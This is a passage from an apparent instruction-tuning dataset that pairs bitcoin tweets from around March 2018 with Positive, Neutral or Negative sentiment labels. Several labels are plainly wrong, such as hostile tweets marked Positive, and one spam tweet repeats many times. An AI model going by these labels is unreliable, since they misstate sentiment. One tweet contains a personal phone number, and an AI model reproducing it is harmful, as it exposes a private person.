"output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@crypto_capone Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Satoshi's genius was building a system that didn't need him to be succesful.\n\nBitcoin is self-sufficient.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@APompliano but what if someone killed all the bitcoin developers?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Satoshi Nakamoto as banned the project of bitcoin in 2015. So making money off a dead coin pure trolling!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoCamel1 @MoonOverlord I hate to tell you this... but even 10,000 50k+ follower accounts don't make 24k bitcoin volume.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin #elliot 5th wave coming with squeeze over 9200", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ashleyfeinberg will you throw me a party with your bitcoin money to unveil", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@buzzshownetwork \nThis project is great\n#Bitcoin #ICO #BTC #ETH #YouTube", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@brian_lovin @ruzannaroz If someone can tell me a quick shortcut for the degrees symbol I\u2019ll give you all the Bitcoin I own", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mybtcnig I'm from China. I need a lot of gift card and bitcoin. Can you see the price list of your goods?\nMy whatsapp:+8618678303679", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@option_snipper For a second I thought the chart belongs to bitcoin LOL", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Dry_Observer @DrDenaGrayson @ericgarland what are the references to bitcoin? i must\u2019ve missed this connection.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "how many out there have applied the Ichimoku Cloud to trading #bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@xkeepah @illusionfoxe not to mention, that recent report that talked about how every bitcoin(?) contains CP", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8650.44\nEthereum:$534.767\nBitcoin Cash:$1010.69\nLitecoin:$162.129\nRipple:$0.650947\nIOTA:$1.31849", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8650.44 / 7021.129\u20ac\n1 bitcoin-cash = $1007.59 / 817.81\u20ac\n1 ethereum = $534.767 / 434.043\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8557.49@bitstamp. High $9099.590. Low $8503.520. Market Cap $144.899 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AndrewQuackson The Bolton move was set up by Barron for bitcoin gainz.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003330 (-0.00000044) #BTC / 0.286412 (-0.00641) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077699 (-0.00001417) #BTC / 6.69056 (-0.17639) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002276 (-0.00000021) #BTC / 0.195699 (-0.00371) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0472481 (-0.00022870) #BTC / 406.329 (-5.75100) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004793 (-0.00000036) #BTC / 0.412197 (-0.00752) #USD. Market rank is 114. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8704.67 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What\u2019s up with them bitcoin wallets... y\u2019all been quiet lately.. talk to me", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u269c Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.40B USD\n#bitcoin #cryptopaymon \ud83e\udd16", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge isn't he the guy who put the Child Porn on Bitcoin blockchain?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8644.33 as of Thu Mar 22 20:31:10 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mohsen1987 @BTCTN Time to unsubscribe from Roger controlled Twitter account @BTCTN #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@thealicemoon twitter, instagram, my bike apps, and all my bitcoin apps LOLz", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blockchain_Jay @Altcoinbuzzio So why is bitcoin such a shithead?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is based on #blockchain. A public ledger of transactions that's safe, huge potential to be future currency. #bitcoinminer", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 02:31:58 2018 (18:26)\nUSD : 8596.62\nWght: 0.43\nBlk#: 514746\nSize: 924.5 KB\nTXs: 2069\nPool: 47 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JessicaHuseman He's going to create a bitcoin-economy sovereign nation Web site called Bannsylvania?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin: the movie", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ezbreh @altcointhoreau easy.. sell house when 3k and buy more bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC #bitcoin \nScalp trade entered: $8580", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@thecryptokidd @rogerkver @Falkvinge Be carefull, bitcoin ticker is not $BCH, that's the ticker for bcash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000048e6d5fc56c1eb43530236193bd8bec8101caf8f2befd7 mined at height 514746.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So @rocketman_ai you like #Bitcoin & #Crypto Cool \ud83d\udc4d\ud83c\udffb Great to connect RocketMan much appreciated", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rawnstet I didn't know you were into bitcoin!!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Go home, Bitcoin, you\u2019re drunk.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Never bring up #bitcoin during a bachelor party...... @skutty21 @stvnclmnt @Sussy28", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin -- to all you traders prolonging progress. Time to let it fall and the market to consolidate. #letitfall", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Your bet, your rules! This is how says @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Your bet, your rules! This is how says Bethereum #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u2604 Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.40B USD\n#bitcoin #cryptopaymon \ud83e\udd16", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What will the eventual, full-blown, Hollywood movie about Bitcoin be called? \n\nMy guess:\n\n\"Holders\"\n\n#BTC #cryptocurrencies", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8666.39.\nThe current price of BCash is $1007.41, or 0.116903 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin will be succesful because it's not beholden to quarterly earnings calls or four year political cycles.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cryptorick_ That's the only reason Bitcoin exists..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin will be succesful because it's not beholden to quarterly earnings calls or four year political cycles.\n\nTwo-time preference.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MrHodl @rogerkver @Falkvinge #Bitcoin touched @rogerkver somewhere, that is why he hates it. All makes sense now.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin news sentiment changed to Negative in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It is a exiting news. I hope it will be a great project.\n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Correcting wrong or strange Kanji Tattoo designs.\n1 revision \uff1d 0.00005bitcoin\nGive me DM or reply.\n#Japanese #Kanji #tattoo #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin as a response to Woke Capital ascending to banking infrastructure. God Bless programming", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-KORE AskRate: 0.00035205 #Bittrex #KORE $KORE #Kore #altcoin #bitcoin #cryptocurrencies\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8631.56 / 7005.805\u20ac\n1 bitcoin-cash = $1007.08 / 817.396\u20ac\n1 ethereum = $533.447 / 432.972\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Ready Player One is a synonym for bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Yes, I'm reading all the updated exchange TOU's. But I'm sure as hell not liking it. #bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TradeSatoshi Deposited some bitcoin a couple of hours ago. Still hasn\u2019t shown!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --39.23%, ($-5558.76) [Currently $8611.245] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@fixcars *the evolved bitcoin markets*", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Cityof Atlanta has a cyber attacker?\nlocked them out of accounts for ransom in bitcoin or sumn lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@monkeytwn Make 10, buy 10 bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I\u2019d also conservatory estimate 22.5% bitcoin dominance which is 30K. If $btc dominance is 40% it\u2019s 50K", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blockchain_Jay Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@stephanlivera I always bribe politicians in Bitcoin!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "*remembers having millions of neopoints on account*\n\n...\n\nalexa are neopoints and bitcoin the same thing", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Please help our Crypto Community continue to grow!! \u2693\ufe0f\ud83d\udc99 Follow us @Crypt0_Couple!! #Litecoin #bitcoin #help #SOS", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AT 8598.665", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#BinaryFest #BinaryOptions #Forex #Bitcoin #MakeMoney, How to Choose the Best Forex Broker For You...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@coindesk Would be curious to see how this actually works #btc #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The Robot can tell the price movements in the next few seconds, that's why it's easy to win much money very fast. #BestEA #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Stephen81183184 @YouTube Lol the guys does bad investment on bitcoin, and tries to gives some on Linda. 1000x!!! Where do i sign lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8630.0 / 7004.539\u20ac\n1 bitcoin-cash = $1005.0 / 815.708\u20ac\n1 ethereum = $533.418 / 432.948\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Using my telepathic powers to make bitcoin violate this 1H bear flag. You\u2019ll see.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ericgarland Was Bitcoin involved in the laundering of campaign money.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ruzannaroz @brian_lovin That\u2019s the one! You win all my bitcoin! Sorry that I don\u2019t own any....", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@jaykelly26 \ud83d\udc4dBBC is much more trustworthy I still don't understand shite about bitcoin tho", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ericgarland Was Bitcoin involved in the laundering of campaign money?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Delete Facebook, become a walking bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cz_binance @brazvan93 I can't wait for the day where Bitcoin is resilient enough to shrug off bullshit like this.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Trader_Dante Am only interested in your 24k gold bitcoin toilet flush button", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8604 / \u20ac6974 / \u00a36092 @ Block 514746. \nMarket Cap: 147.33B USD. #Bitcoin #\u30d3\u30c3\u30c8\u30b3\u30a4\u30f3", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is on its way to be at 7k or lower in a couple of days. XRP can go to 0.51 #Btc #bitcoin #Crypto #XRP #Ripple", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Wow my tweet is getting deleted about @usbank not processing crypto transactions? What\u2019s actually going on... \n\n#crypto\n#BTCUSD \n#bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@el33th4xor Theres plenty - however, they only take legitimate Bitcoin. Not Btrash. Unlucky for you.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is an automated third party.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@matthiasochs13 @LaneSnyder22 he's working with responsive blockchain artificial intelligence and gets paid in bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My goal is to inspire a new generation of Bitcoin shitposters, so I can fade away and dissappear into the background....", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Increasing the Bitcoin blocksize was the most important step, but it's one among many.\"\n\n- Emin G\u00fcn Sirer @Satoshis_Vision Conference", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@el33th4xor 'hey all look at me im a nice guy donating to charity with Bitcoin Cash - see, we're the good guys'. You make me sick.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is simply an automated third party.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I feel that bitcoin is ridiculous and that's excellent", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "nerds still screeching about Bitcoin on my TL \ud83e\udd2a\ud83e\udd2a\ud83e\udd2a", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Ecuador the only country in the world where you can buy real estate with BTC and ETH contact me. @Bitcoin @ethereum @bitcoingold @BITCOlN", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "third speaker @Satoshis_Vision @el33th4xor \n\n#BitcoinNG\n\"a roadmap for how I believe #bitcoin can scale.\"", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Have you invested in Bitcoin or any other cryptocurrency?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The Thrive Labs Team is launching a revolutionary Premium Decentralized Advertising Marketplace.\n#thrive #ico #ethereum #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This coin exchange crap is dumb.\nExchange burn - 1/1 crap \nDoes bitcoin or Litecoin do this crap. Not easy for all of us to exchange", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alamin24 @Bitcoin It will be more advanced in the future!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sabrina_nellie_ Bitcoin or another cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zucando ??? I love #bitcoin #ethereum and #Litecoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30499.00000000 | BITCOIN(BLCHAIN) R$28551.67 | LITECOIN(MCDTBC) R$577.10000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Good question: which has more attributes of money or currency -- Bitcoin, or Amazon gift cards? Its close call.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8611.88 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,633.16, market cap of $146,196,624,986 (44.07%), and 24 hr vol. of $5,424,050,000 (37.37%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 07:00PM #Bitcoin Price:\nUSD 8732.51 | EUR 7060.80 | JPY 933609.45", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,633.16\nChange in 1h: -0.85%\nMarket cap: $146,196,624,986.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,611.88, EUR 6,990.94", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8633.16\nEthereum:$534.243\nBitcoin Cash:$1003.27\nLitecoin:$162.158\nRipple:$0.650443\nIOTA:$1.31164", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.12% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8643.3 / 7015.334\u20ac\n1 bitcoin-cash = $1003.27 / 814.304\u20ac\n1 ethereum = $534.243 / 433.618\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PardonMyTake Are we still supporting bitcoin 2 gen now", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC \ud83d\udcb5 price: $8633.16 1.00000BTC \n1h: -0.85% \ud83d\udd3b \n1d: -4.71% \ud83d\udd3b \n7d: +4.90% \ud83d\udcc8 \n\ud83d\udc7e #Bitcoin 24h volume: $5,424,050,000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8584.17/$8586.66 #Bitstamp\n$8583.54/$8591.87 #Kraken\n\u21e2$-3.12/$7.70\n$8559.49/$8645.52 #Coinbase\n\u21e2$-27.17/$61.35", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Should you buy or sell today? Check our YouTube channel! We analyze over 30 pairs, also Gold, Silver, Oil and Bitcoin! #LowRisk", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004854 (+0.00000061) #BTC / 0.417313 (+0.00512) #USD. Market rank is 112. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002266 (-0.00000010) #BTC / 0.194882 (-0.00082) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8618.00 | -0.0082%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0472347 (-0.00001340) #BTC / 406.28 (-0.04900) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.0007845 (+0.00000751) #BTC / 6.74772 (+0.05716) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003374 (+0.00000044) #BTC / 0.290085 (+0.00367) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 02:00 UTC Bitcoin Price: 8608.76 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,593.00 v #BitcoinCash $999.26 (BTC/BCH 8.6), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 11:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@APompliano brother can you please give me the definitive source for someone who knows nothing on bitcoin and would like to know everything?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8584.17 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin percentage of market cap: 44.12 %\n#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BarroniBaloney @synningsaint @Bella_ofA @BelleReaver Oh & about that bitcoin bounty.....", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@silveragorism @Bitcoin @signalapp @myWickr @Samsung @tipprbot Thank you so much for the support!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u203c\ufe0f$BTC\u203c\ufe0f Bitcoin is now $8584.17", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of $Bitcoin is $8584.17 via #Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8584.17 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8584.17 via Chain #BTCUSD #cryptocurrencies #blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8643.30 Down -$77.72 -0.90% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000004a17ad7123b0eae9c15cabf7951ad24c44dba46ec20606 mined at height 514747.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8584.17 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8584.17", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:03:26 2018 (31:28)\nUSD : 8608.67\nWght: 0.43\nBlk#: 514747\nSize: 1107.3 KB\nTXs: 3026\nPool: 363 (0.6 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin will have a really big move soon and I don't think it will be pretty. Make sure you guys are sitting in nice profits.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "f95cc0f66da4f837449df758f41a5d732345088decf2a29ebafcd80bbf52c8aa/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I really wanna China vs USA financial war can fully on, I don't care who wins, but expect a huge pump in bitcoin, cuz we like chaos \ud83c\udf1a", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BradSherman did you tell him bitcoin is terror", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WeareThrivelabs #thrive #ico 